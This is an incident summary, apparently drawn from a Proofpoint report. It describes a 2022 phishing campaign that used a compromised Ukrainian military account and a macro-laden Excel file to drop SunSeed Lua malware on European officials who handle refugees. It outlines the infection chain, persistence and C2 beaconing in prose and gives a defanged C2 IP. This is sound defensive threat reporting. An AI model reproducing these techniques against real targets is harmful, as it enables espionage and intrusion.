Cyber Incident Victim: Compromised accounts of Ukrainian military personnel are being used to attack European government officials involved with refugees from Ukraine.

On February 24, 2022, Proofpoint identified a phishing campaign originating from a compromised Ukrainian military email account (ukr[.]net domain) belonging to an individual associated with military unit A2622 in Ukraine’s Chernihiv region. The email leveraged social engineering tied to an Emergency Meeting of the NATO Security Council held the previous day, using the subject line "IN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE SECURITY COUNCIL OF UKRAINE DATED 24.02.2022." It contained a malicious macro-enabled Excel file ("list of persons.xlsx") designed to deploy SunSeed, a Lua-based malware. When enabled, the macro executed a VB script that silently downloaded an MSI package from an actor-controlled IP via Windows Installer (msiexec.exe), suppressing user interface alerts to conceal the activity. The MSI package installed modified legitimate components, including a Windows Lua interpreter (sppsvc.exe) altered to hide console output, 12 Lua dependencies, and the SunSeed script ("print.lua"). Persistence was achieved through an LNK file placed in the Windows Startup directory, executing the malware upon system boot. SunSeed functioned as a downloader, beaconing to a command-and-control (C2) server (84.32.188[.]96) every three seconds via HTTP GET requests. These requests appended the infected host’s C Drive partition serial number, potentially enabling victim tracking or selective payload delivery. The MSI package exhibited unusual characteristics, including Japanese Shift-JIS encoding in installation messages and creation using an outdated version (3.11.0.1528) of the WiX Toolset, last updated in 2017.

The campaign targeted European government personnel responsible for refugee transportation, budget allocation, and population movement logistics, indicating an intelligence-gathering objective aligned with monitoring refugee flows from Ukraine. Proofpoint linked the activity temporally and thematically to phishing campaigns reported by Ukrainian CERT-UA and SSSCIP between February 21-25, 2022, which warned of mass compromises of Ukrainian military personnel accounts by UNC1151 (tracked by Proofpoint as TA445). While definitive attribution was not established, Proofpoint noted overlaps with TA445’s historical operations, including the use of compromised accounts, targeting of NATO governments, and focus on refugee-related disinformation. Technical parallels were observed with a July 2021 campaign employing nearly identical macros, MSI package construction via the same WiX version, and Lua malware beaconing drive serial numbers. TA445, assessed to operate from Belarus, has historically conducted hybrid warfare operations blending cyber intrusions with disinformation to amplify anti-refugee sentiment and strain NATO cohesion. The incident occurred amid the Russia-Ukraine conflict, reflecting a broader pattern of exploiting compromised Ukrainian assets to target entities involved in Western humanitarian or logistical responses.